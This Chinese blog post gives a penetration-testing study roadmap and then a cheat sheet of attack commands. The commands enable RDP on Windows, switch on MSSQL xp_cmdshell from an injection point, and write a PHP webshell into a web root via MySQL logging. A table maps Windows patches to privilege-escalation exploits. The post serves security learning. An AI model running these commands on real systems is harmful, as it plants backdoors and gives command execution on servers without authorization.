当前位置:   article > 正文

渗透测试知识点总结(非常详细),从零基础入门到精通,看完这一篇就够了_渗透测试 二进制安全

渗透测试 二进制安全

直接上货!

核心:

1.web安全

2.二进制安全(包括逆向工程和漏洞利用)

3.密码学知识

其他基础:

1.软件开发

2.数据库原理

3.编程语言

4.计算机取证分析和隐写术

5.网络协议及网络算法

6.算法与数据结构

7.研究开源工具的基本原理,懂得自制工具

Web安全:

1.注入类:SQL注入;XSS跨站脚本攻击;XXE;命令执行命令注入(bash);文件上传文件下载

2.信息漏洞:源码泄露;敏感信息接口;员工资料泄露;服务器信息泄露

3.逻辑类:权限绕过;条件竞争;数据篡改

网站工作原理:HTTP协议;Webserver

HTTP协议构成:

1.http-header构成(request response)

2.http-body 构成(request response)

3.http方法

Webserver:

1.Webserver分类

2.Webserver解析流程

3.Webserver基础安全

编程语言:

前端:html,css,javascript

后台和脚本语言:php,java,python

数据库原理:

关系型数据库(MySQL)和非关系型数据库

逆向工程:

1.体系结构:机器指令和汇编语言

2.编译原理:自动机,词法分析,语法分析

3.操作系统:系统的加载与引导

4.计算机组成原理

漏洞挖掘与利用:

1.逆向工程

2.模糊测试

3.什么是漏洞

4.程序员在什么时候会犯错

5.信息收集工具:端口,子域名,代码泄露,员工字典

6.数据包抓取修改重放工具

7.顺手的浏览器及插件(火狐Hackbar)

8.VPS,漏洞验证

9.分析业务功能

10.分析web架构

11.针对性的罗列可能的漏洞类型

12.详细测试:不放过任何一个数据包

13.单一利用:Getshell;敏感信息接口

14.组合利用:XSS+CSRF

密码学:

1.古典密码学:凯撒密码;移位密码

2.现代密码学:对称加密体系(DES;AES)和非对称加密体系(RSA)

Win2003

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
  • 1

Win2003,WinXP

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  • 1

Mssql开启xp_cmdshell

关闭命令

EXEC sp_configure 'show advanced options', 1; //显示或修改高级选项
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',0;
RECONFIGURE;

  • 1
  • 2
  • 3
  • 4
  • 5

开启命令

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

  • 1
  • 2
  • 3
  • 4
  • 5

在注入点运行上述语句时,如果出现这样的回显,标记message: 配置选项 ‘xp_cmdshell’ 不存在,可执行以下语句

EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'user connections',1;
RECONFIGURE;
  • 1
  • 2
  • 3
  • 4

Mysql日志拿shell

set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/sinight.php';
select '<?php @assert($_POST["sinight"]); ?>';
set global general_log = off;
  • 1
  • 2
  • 3
  • 4

Windows提权对照表

#Security Bulletin   #KB     #Description    #Operating System
 
CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)
MS16-075  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
MS16-032  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)
MS15-097  [KB3089656]  [remote code execution]  (win8.1/2012)
MS15-076  [KB3067505]  [RPC]  (2003/2008/7/8/2012)
MS15-077  [KB3077657]  [ATM]  (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061  [KB3057839]  [Kernel Driver]  (2003/2008/7/8/2012)
MS15-051  [KB3057191]  [Windows Kernel Mode Drivers]  (2003/2008/7/8/2012)
MS15-010  [KB3036220]  [Kernel Driver]  (2003/2008/7/8)
MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001  [KB3023266]  [Kernel Driver]  (2008/2012/7/8)
MS14-070  [KB2989935]  [Kernel Driver]  (2003)
MS14-068  [KB3011780]  [Domain Privilege Escalation]  (2003/2008/2012/7/8)
MS14-058  [KB3000061]  [Win32k.sys]  (2003/2008/2012/7/8)
MS14-040  [KB2975684]  [AFD Driver]  (2003/2008/2012/7/8)
MS14-002  [KB2914368]  [NDProxy]  (2003/XP)
MS13-053  [KB2850851]  [win32k.sys]  (XP/Vista/2003/2008/win 7)
MS13-046  [KB2840221]  [dxgkrnl.sys]  (Vista/2003/2008/2012/7)
MS13-005  [KB2778930]  [Kernel Mode Driver]  (2003/2008/2012/win7/8)
MS12-042  [KB2972621]  [Service Bus]  (2008/2012/win7)
MS12-020  [KB2671387]  [RDP]  (2003/2008/7/XP)
MS11-080  [KB2592799]  [AFD.sys]  (2003/XP)
MS11-062  [KB2566454]  [NDISTAPI]  (2003/XP)
MS11-046  [KB2503665]  [AFD.sys]  (2003/2008/7/XP)
MS11-011  [KB2393802]  [kernel Driver]  (2003/2008/7/XP/Vista)
MS10-092  [KB2305420]  [Task Scheduler]  (2008/7)
MS10-065  [KB2267960]  [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059  [KB982799]   [ACL-Churraskito]  (2008/7/Vista)
MS10-048  [KB2160329]  [win32k.sys]  (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015  [KB977165]   [KiTrap0D]  (2003/2008/7/XP)
MS09-050  [KB975517]   [Remote Code Execution]  (2008/Vista)
MS09-020  [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)
MS09-012  [KB959454]   [Chimichurri]  (Vista/win7/2008/Vista)
MS08-068  [KB957097]   [Remote Code Execution]  (2000/XP)
MS08-067  [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025  [KB941693]   [Win32.sys]  (XP/2003/2008/Vista)
MS06-040  [KB921883]   [Remote Code Execution]  (2003/xp/2000)
MS05-039  [KB899588]   [PnP Service]  (Win 9X/ME/NT/2000/XP/2003)
MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45

Win下面各种文件下载姿势

http://www.cnblogs.com/backlion/p/7908563.html
https://www.freebuf.com/articles/system/155147.html

Python开启HTTP服务

Python <= 2.3
python -c “import SimpleHTTPServer as s; s.test();” 8000
Python >= 2.4
python -m SimpleHTTPServer 8000
Python 3.x
python -m http.server 8000

各种文件上传姿势总结

https://github.com/cnnetarmy/uploadfile
https://myzxcg.github.io/20171116.html

另外为了帮助到大家更好的学习 博主在这里准备一些Kail 渗透测试的学习资料(文末领取)

内容非常详细且全面,覆盖了Web安全的方方面面,既有初学者入门的内容也有适合大牛提升的内容,包含:视频进阶教程、BATJ、360和奇安信等大厂实战项目渗透实用工具包以及Kali安全技能书籍,助你一步步成为安全圈的大牛。

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】

推荐阅读
相关标签